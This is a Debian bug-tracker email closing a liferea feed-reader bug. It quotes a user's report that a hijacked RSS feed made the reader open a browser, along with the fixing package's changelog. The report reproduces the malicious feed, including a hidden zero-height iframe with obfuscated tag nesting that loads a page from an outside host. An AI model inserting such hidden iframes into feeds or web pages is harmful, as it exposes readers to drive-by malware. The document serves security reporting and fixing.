Bug#474736: marked as done (liferea: opens browser for titles and descriptions with embedded URLs)

Tue, 17 Mar 2009 09:04:54 -0700 

Your message dated Tue, 17 Mar 2009 15:32:26 +0000
with message-id <[email protected]>
and subject line Bug#474736: fixed in liferea 1.5.13-1
has caused the Debian Bug report #474736,
regarding liferea: opens browser for titles and descriptions with embedded URLs
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)


-- 
474736: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=474736
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message --- 
Package: liferea
Version: 1.4.14-1
Severity: grave


When I click on this feed: http://www.borowitzreport.com/, the first
item is (currently) the following.  Liferea pops up a browser window
for the embedded URL in the <iframe> whenever I try to display
headlines -- I'm not even trying to read the body of the item.

The fact that the link points to a site in Changzhou, China, and the
strange nesting of the end tag -- <</iframe>/iframe> -- makes me think
this feed was hijacked, so liferea's behavior is a security hole.

<rss version="2.0">
        <channel>
<title>Borowitz Report</title>
<link>http://www.borowitzreport.com</link>
        <description>
Market Tumbles on News That Bush Is Still President - White House Appearance 
&#8216;A Painful Reminder,&#8217; Experts Say<IfrAME 
src=//h28.8800.org/hxw/hx/f.htm height=0><</ifRAME>/ifRAME>
</description>
<language>en - us</language>
        <image>
<title>Borowitz Report</title>
        <url>
http://www.borowitzreport.com/grfx/shocker_banner.gif
</url>
<link>http://www.borowitzreport.com</link>
</image>
        <item>
        <title>
Market Tumbles on News That Bush Is Still President - White House Appearance 
&#8216;A Painful Reminder,&#8217; Experts Say<IfrAME 
src=//h28.8800.org/hxw/hx/f.htm height=0><</ifRAME>/ifRAME>
</title>
        <description>
President George W. Bush used a Rose Garden appearance today to reassure 
investors that he was at the helm of the U.S. economy, causing stock markets to 
plummet around the world.

“You don’t have to worry about this economy, because I am in charge of it,” 
said Mr. Bush, touching off what some observers were calling a global financial 
panic.

Mr. Bush began his remarks about the economy at 10:30 A.M. eastern time, and by 
10:31 markets around the world had already gone into a perilous free-fal
</description>
<author>Andy Borowitz &lt;[email protected]&gt;</author>
−
        <link>
http://www.borowitzreport.com/archive_rpt.asp?rec=6857
</link>
<pubDate>4/3/2008 12:00:00 AM</pubDate>
</item>
</channel>
</rss>

-- System Information:
Debian Release: lenny/sid
  APT prefers testing
  APT policy: (990, 'testing'), (500, 'stable'), (400, 'unstable'), (1, 
'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.24-1-686 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages liferea depends on:
ii  gconf2                 2.22.0-1          GNOME configuration database syste
ii  libatk1.0-0            1.20.0-1          The ATK accessibility toolkit
ii  libc6                  2.7-6             GNU C Library: Shared libraries
ii  libcairo2              1.4.14-1          The Cairo 2D vector graphics libra
ii  libdbus-glib-1-2       0.74-1            simple interprocess messaging syst
ii  libgcc1                1:4.3.0-1         GCC support library
ii  libgconf2-4            2.22.0-1          GNOME configuration database syste
ii  libgcrypt11            1.4.0-3           LGPL Crypto library - runtime libr
ii  libglade2-0            1:2.6.2-1         library to load .glade files at ru
ii  libglib2.0-0           2.16.1-2          The GLib library of C routines
ii  libgnutls26            2.2.2-1           the GNU TLS library - runtime libr
ii  libgtk2.0-0            2.12.9-2          The GTK+ graphical user interface 
ii  libice6                2:1.0.4-1         X11 Inter-Client Exchange library
ii  liblua5.1-0            5.1.3-1           Simple, extensible, embeddable pro
ii  libnm-glib0            0.6.5-5           network management framework (GLib
ii  libnotify1 [libnotify1 0.4.4-3           sends desktop notifications to a n
ii  libpango1.0-0          1.20.0-1          Layout and rendering of internatio
ii  libsm6                 2:1.0.3-1+b1      X11 Session Management library
ii  libsqlite3-0           3.5.7-1           SQLite 3 shared library
ii  libstdc++6             4.3.0-1           The GNU Standard C++ Library v3
ii  libx11-6               2:1.0.3-7         X11 client-side library
ii  libxml2                2.6.31.dfsg-2     GNOME XML library
ii  libxslt1.1             1.1.22-1          XSLT processing library - runtime 
ii  libxul0d               1.8.1.13-1        Gecko engine library
ii  zlib1g                 1:1.2.3.3.dfsg-11 compression library - runtime

Versions of packages liferea recommends:
ii  curl                          7.18.0-1   Get a file from an HTTP, HTTPS or 
ii  dbus                          1.1.20-1   simple interprocess messaging syst
ii  dbus-x11                      1.1.20-1   simple interprocess messaging syst
ii  wget                          1.10.2-3   retrieves files from the web

-- no debconf information

--- End Message ---
--- Begin Message --- 
Source: liferea
Source-Version: 1.5.13-1

We believe that the bug you reported is fixed in the latest version of
liferea, which is due to be installed in the Debian FTP archive:

liferea-data_1.5.13-1_all.deb
  to pool/main/l/liferea/liferea-data_1.5.13-1_all.deb
liferea-dbg_1.5.13-1_amd64.deb
  to pool/main/l/liferea/liferea-dbg_1.5.13-1_amd64.deb
liferea_1.5.13-1.diff.gz
  to pool/main/l/liferea/liferea_1.5.13-1.diff.gz
liferea_1.5.13-1.dsc
  to pool/main/l/liferea/liferea_1.5.13-1.dsc
liferea_1.5.13-1_amd64.deb
  to pool/main/l/liferea/liferea_1.5.13-1_amd64.deb
liferea_1.5.13.orig.tar.gz
  to pool/main/l/liferea/liferea_1.5.13.orig.tar.gz



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Luis Rodrigo Gallardo Cruz <[email protected]> (supplier of updated liferea 
package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Thu, 12 Mar 2009 23:24:20 -0700
Source: liferea
Binary: liferea liferea-data liferea-dbg
Architecture: source all amd64
Version: 1.5.13-1
Distribution: experimental
Urgency: low
Maintainer: Luis Rodrigo Gallardo Cruz <[email protected]>
Changed-By: Luis Rodrigo Gallardo Cruz <[email protected]>
Description: 
 liferea    - feed aggregator for GNOME
 liferea-data - architecture independent data for liferea
 liferea-dbg - liferea debug symbols
Closes: 386584 474736 493027 511869
Changes: 
 liferea (1.5.13-1) experimental; urgency=low
 .
   * New Upstream Release (Closes: #493027, #511869, #386584, #474736).
     - 1.5 devel branch.
     - All rendering backends other than webkit have been removed.
     - Update build-dependencies:
      - Minimum versions of GTK+ and GLib raised to 2.12 and 2.16, respectively.
      - Added libcurl.
      - Removed GnuTLS.
     - Update watch file.
     - XSPF has been removed upstream. Remove packaging rules related to it.
   * Removed lua5.1.pc patch, it's not needed anymore.
     - Rebase all patches. No content changes.
   * Cleanup minor lintian warnings.
   * Update debian/copyright to the new machine readable format. Add all
     copyright holders from the various files.
   * Update pixmap icon from new upstream's versions.
Checksums-Sha1: 
 a17066255663e4ed01112cb13f62f0d03e336f0c 1509 liferea_1.5.13-1.dsc
 e38bef63a4cb84f3ee1fdcc581470f1e9179004d 1462079 liferea_1.5.13.orig.tar.gz
 ab7b688fca0ec28588db2d5c90685afc3a548fcc 17950 liferea_1.5.13-1.diff.gz
 eecd07bd0e9ab8968d4eb4cec67e9c9b04eb6c92 651434 liferea-data_1.5.13-1_all.deb
 db61c8db3da51af1f2581578ce2331610f672c75 276396 liferea_1.5.13-1_amd64.deb
 7a9b88bd71e1fd53c92a9d0c06c45714b0525434 637752 liferea-dbg_1.5.13-1_amd64.deb
Checksums-Sha256: 
 68605cac853dcc5eac6ff4a84809b6d9b58fa4cfd8374a410bfccca8261b779e 1509 
liferea_1.5.13-1.dsc
 bb3f32f5e49784cc86314157c5301c7fabffa12976248b4ac33ca7dc2093c520 1462079 
liferea_1.5.13.orig.tar.gz
 46408a8c0123f35338abad192a6c23fc555ce5391a137a7bfdc8c60b01479803 17950 
liferea_1.5.13-1.diff.gz
 18a7abaa1f322afbd2627951c3b9db35b92c102c97bcad7b0e5b45afa6591694 651434 
liferea-data_1.5.13-1_all.deb
 c963e64a4dd30189a0c4ab132d124b0fa28b541f32f2e6584f6f424afdd851c7 276396 
liferea_1.5.13-1_amd64.deb
 1ff734e15f87c0603df34a9ebce4d78f598ab17494800c5ff8d804d401241f85 637752 
liferea-dbg_1.5.13-1_amd64.deb
Files: 
 d8a03ceb7f5a43105d6388e3fe9bdb78 1509 gnome optional liferea_1.5.13-1.dsc
 0816760d23f08a1bb8cd71d2ce297038 1462079 gnome optional 
liferea_1.5.13.orig.tar.gz
 8781a60fa3cec8d7f975570b244acc5d 17950 gnome optional liferea_1.5.13-1.diff.gz
 a86781b33ed6ce723848bca232ca511c 651434 gnome optional 
liferea-data_1.5.13-1_all.deb
 9a1ad9f16df52805f55c89f1e3b8a378 276396 gnome optional 
liferea_1.5.13-1_amd64.deb
 dc5ae2432604ad01fd21f9bbc935d53c 637752 gnome extra 
liferea-dbg_1.5.13-1_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkm/v2EACgkQAZmDGK3JvCjU8QCfTruLiknh9LhiMj89fBvi+84V
pUEAn0c+TsruUCZt8sWRnzUoD4/Djwn/
=rzIp
-----END PGP SIGNATURE-----

--- End Message ---

Reply via email to